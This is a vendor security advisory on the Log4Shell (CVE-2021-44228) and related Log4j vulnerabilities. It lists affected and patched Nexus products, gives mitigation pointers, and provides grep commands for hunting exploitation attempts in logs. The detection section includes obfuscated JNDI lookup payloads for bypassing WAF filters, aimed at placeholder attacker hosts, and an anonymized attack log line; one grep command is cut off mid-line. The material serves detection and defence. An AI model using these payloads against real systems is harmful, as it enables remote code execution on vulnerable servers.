Log4J / Log4Shell Vulnerability information
General information
This article contains information related to the remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/
Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.
This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.
Further on, these additional CVEs was also reported for Log4j, CVE-2021-45046 for the 2.15 version, as well as CVE-2021-45105 for 2.16.
The Nexus Security team has investigated the impact of the Log4j remote code execution vulnerability (CVE-2021-44228), (CVE-2021-45046), (CVE-2021-45105) and the possible impact on our products.
Information about the update
Refer to the table in section "Nexus components" for the latest information for the components.
CVE-2021-45105
There was a new vulnerability (CVE-2021-45105) detected in Log4j, which has been fixed with version Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability.
Customers who still want to update to the latest Log4j version 2.17, can download the corresponding version from the official Log4j website, and replace the version 2.16 JAR file with the new one.
Nexus will update Log4j again with the next regular release of the corresponding product versions.
Releases with fixed versions of the affected components:
Smart ID version 21.10.2 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.2Smart ID version 21.10.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.1Smart ID version 21.04.7 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.7Smart ID version 21.04.6 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.6Smart ID version 20.11.4 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.4Smart ID version 20.11.3 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.3Digital Access version 6.1.2 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, and it is packaged with Log4j 2.17.
You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.2Digital Access version 6.1.1 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.1Smart ID Identity Manager (PRIME) version 3.12.14 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.12.14Smart ID Identity Manager (PRIME) version 3.11.5 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5Smart ID Identity Manager (PRIME) version 3.10.32 – This version is packaged with Log4j 2.17.1.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.32Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30
Nexus SaaS customers
If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching is performed by the SaaS delivery team. Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE.
Nexus components
This list contains the components from Nexus, and their respective affected versions.
Component | Affected versions | Comment |
|---|---|---|
Smart ID Certificate Manager | None of the supported versions are affected | Does not use Log4j |
Nexus OCSP Responder | None of the supported versions are affected | Does not use Log4j |
Nexus Timestamp Server | None of the supported versions are affected | Does not use Log4j |
Smart ID Desktop / Mobile App | None of the supported versions are affected | Does not use Log4j |
Nexus Card SDK | None of the supported versions are affected | Does not use Log4j |
Smart ID Physical Access | None of the supported versions are affected | Does not use Log4j |
Smart ID Digital Access (previously named Hybrid Access Gateway – HAG) | Versions => 6.0.5 and later could be affected if customers have configured Digital Access to use a syslog server for logging. |
Versions < 6.0.5 are not affected All versions of HAG are not affected |
Smart ID Identity Manager / PRIME | EOL WAR versions: |
Recommendation is to implement mitigation as described below, or upgrade. |
Smart ID Self-Service | Supported WAR versions: 3.9 20.06 | Recommendation is to implement mitigation as described below, until Nexus has provided an official fix |
Smart ID Messaging component - Hermod | None of the supported versions are affected | Hermod is shipped with Log4j framework, in this case log4j-api, which is not affected. Hermod uses logback for its logging, and not Log4j. See reference in documentation: Link and: Link |
If you have made any customized adaptations of your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ship our released versions to you.
Mitigation
Patch using the latest available version from Nexus, as specified above.
For temporary mitigations, we recommend that you refer to Apaches public documentation for each specific CVE: https://logging.apache.org/log4j/2.x/security.html
Further information
As an additional recommendation, we highly encourage you to investigate all other application servers (non Nexus software) you might have, that could use Log4j.
We also encourage you to perform log analysis of your application and network traffic and to take appropriate steps for mitigation.
This list contains some of the known applications that could be vulnerable to this CVE:
Apache Struts
Apache Solr
Apache Druid
Apache Flink
ElasticSearch
Flume
Apache Dubbo
Logstash
Kafka
Spring-Boot-starter-log4j2
Log4j RCE exploitation detection
You can use these commands and rules to search for exploitation attempts against Log4j RCE vulnerability CVE-2021-44228.
The below commands are examples, and you will need to point the commands to your respective application log folder.
Nexus does not have access to the systems hosted by you, the customer, (except for Nexus SaaS Services, where this is handled by the service organization) and it is vital that you perform investigations of your own to make sure that you have not been breached and is subject to any form of data breach.
Grep / Zgrep
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/logThis command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'Grep / Zgrep - Obfuscated variants
These commands cover even the obfuscated variants but lack the file name in a match.
This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:
sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:
sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(lYara file
YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virus total and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.
On this GitHub page, you can find a YARA file that is tailormade for this CVE (CVE-2021-44228)
Credit for the Grep and Yara files goes to Neo23x0 / Florian Roth. We share these with you, under the Detection Rule license (DRL) 1.1
WAF bypass methods
Many WAF (Web Application Firewall) vendors and providers have implemented WAF rules to be able to stop the traffic before it can reach the application itself.
There are methods to bypass some of the WAF rules, and these are some examples of methods that we would encourage you to search for in your logs, to see if your WAF might not have caught these requests.
Note: asdasd and xxxxxx are only examples, this will be the attackers url in a real scenario.
Example
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}This is an example of how this could look like in an application log (real request, anonymized):
2021-12-12 05:54:07 0 ip.number.ip.ip 5f7288ab7f41d805 - - - endpoint.ip.number:443 https - GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://111.111.1111.111:12344/Basic/Command/
Base64/V2Ugd291bGQgbm90IHBvc3QgYW55dGhpbmcgbWFsaWNpb3VzIGhlcmUsIHNvIHRoaXMgaXMganVzdCBh
biBleGFtcGxlIHRleHQgY29udmVydGVkIHRvIEJBU0U2NCA6KQ== } host:ip.number.ip.ip:443 404Disclaimer
Nexus has made effort to make this information accurate and reliable. However, the information, including the recommendations provided by Nexus, is provided "as is" without warranty of any kind. Nexus disclaims all warranties, either expressed or implied and Nexus shall in no event be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, which may arise as a result of your use, or inability to use, this information.
Latest update date of this article
2022-03-04
Table of contents